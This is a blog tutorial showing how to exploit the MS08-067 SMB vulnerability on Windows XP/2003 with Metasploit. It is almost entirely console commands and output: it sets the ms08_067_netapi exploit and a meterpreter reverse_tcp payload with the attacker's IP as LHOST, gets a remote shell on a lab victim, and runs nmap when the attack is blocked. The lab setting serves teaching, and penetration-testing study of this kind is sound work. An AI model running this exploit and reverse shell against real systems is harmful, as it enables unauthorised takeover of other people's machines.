Take remote control over a windows XP / 2003 machine with Metasploit

[Leer este post en español]

There are several posts and videos showing this procedure, but as we have received several questions about this topic we’ll show you how to use Metasploit to take remote control over a Windows XP / 2003 machine.

In this post we’ll take advantage of MS08-067 vulnerability that uses the netapi module in the Windows SMB protocol that may be used for arbitrary code execution. For this, we’ll use two machines, one with Metasploit (this can be Windows or Linux) and a Windows XP (this also can be a Windows 2003).

To get started first let’s open the Metasploit console with the command:

# msfconsole

Now, let’s select our vulnerability with the following command:

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) >

Now that the prompt reflects the name of the vulnerability, let’s execute the following command to see how it should be configured:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):
Name      Current Setting   Required  Description
---       ---------------   --------   -----------
RHOST                        yes       The target address
RPORT         445            yes       Set the SMB service port
SMBPIPE     BROWSER          yes       The pipe name to use 

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

The first option RHOST indicates the name or IP address of the Windows XP victim we want to attack. RPORT and SMBPIPE are mandatory options that indicate the port used to send the exploit and the type of connection to use. There’s no need to modify these two last values:

To configure the IP of the XP victim, let’s execute the following command:

msf  exploit(ms08_067_netapi) > set RHOST 192.168.75.90
RHOST => 192.168.75.90

where 192.168.75.90 is the actual IP of the victim

Section “Exploit target” indicates what platforms can be used by this exploit. If we execute the following command we’ll see all platforms vulnerable to this exploit:

msf  exploit(ms08_067_netapi) > show targets
Exploit targets:
Id  Name
--  ----
0   Automatic Targeting
1   Windows 2000 Universal
2   Windows XP SP0/SP1 Universal
3   Windows XP SP2 English (AlwaysOn NX)

From the section above we can see that the actual option of “0” indicates an automatic identification of the victim’s platform, this option is enough and there’s no need to modify it. If you wish, you can change this value to manually define your target with the following command:

msf  exploit(ms08_067_netapi) > set target 1
target => 1

Now we have to configure the payload used by our exploit, this indicates Metasploit what to do once the exploit has been successfully executed on the victim’s machine. We can add this configuration with the following option:

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

The “reverse_tcp” payload executes a reverse client on the XP machine, this module connects back to our Metasploit machine through the default port 4444. This payload is the one that will allow us to take control over the XP victim. Now, to indicate the victim to connect to Metasploit, we have to make the following configuration:

msf  exploit(ms08_067_netapi) > set LHOST 192.168.75.35
LHOST => 192.168.75.35

Where 192.168.75.35 is the IP address of your own Metasploit machine

With all these steps we are now ready to execute the attack. If we execute the “show options” command we’ll see the final configuration of our exploit:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----           ---------------  --------  -----------
RHOST    192.168.75.90    yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread          yes       Exit technique: seh, thread, process, none
LHOST     192.168.75.35   yes       The listen address
LPORT     4444            yes       The listen port

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

If everything is ok, we launch the attack by executing the “exploit” command and just wait for the exploit to complete:

msf  exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.75.90
[*] Meterpreter session 1 opened (192.168.75.35:4444 -> 
192.168.75.90:1049) at 2013-04-08 18:53:58 -0500
meterpreter >

 

The “meterpreter>” prompt indicates that we are now ready to control de XP machine, to corroborate that we are indeed inside this machine, let’s execute the “sysinfo” command:

meterpreter > sysinfo
Computer        : TMWINXP01
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : es_MX
Meterpreter     : x86/win32

Now we can also execute the “shell” command to obtain a prompt from within the victim’s machine and start to execute operations:

meterpreter > shell
Process 1652 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

And there you go! We are now controlling the Victim’s machine. Now, for some situations you may not received the expected meterpreter session, but something similar to the following lines. In this cases you may assume the port we are trying to reach is closed or the attack is being detected by an IPS.

msf  exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout 
The connection timed out (192.168.75.90:445).

The most probable reason for this is the presence of a firewall, may it be external or the Windows firewall, in this case the exploit won’t be able to be executed. If you want to verify the port is closed you can execute the following command from Metasploit.

msf  exploit(ms08_067_netapi) > nmap 192.168.75.90
[*] exec: nmap 192.168.75.90
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT
Nmap scan report for 192.168.75.90
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.75.90 are filtered
MAC Address: 00:0C:29:4E:E1:93 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds

This result confirms the victim is behind a Firewall. In this case we may use another vulnerability / exploit to take remote control of the victim.

 

Remember to send us your questions and comments to our Twitter account: @redinskala where you will find more information and security tips.

Thanks for your visit!

 

One thought on “Take remote control over a windows XP / 2003 machine with Metasploit

  1. Pingback: Tomar control remoto de una máquina Windows XP / 2003 con Metasploit | RedinSkala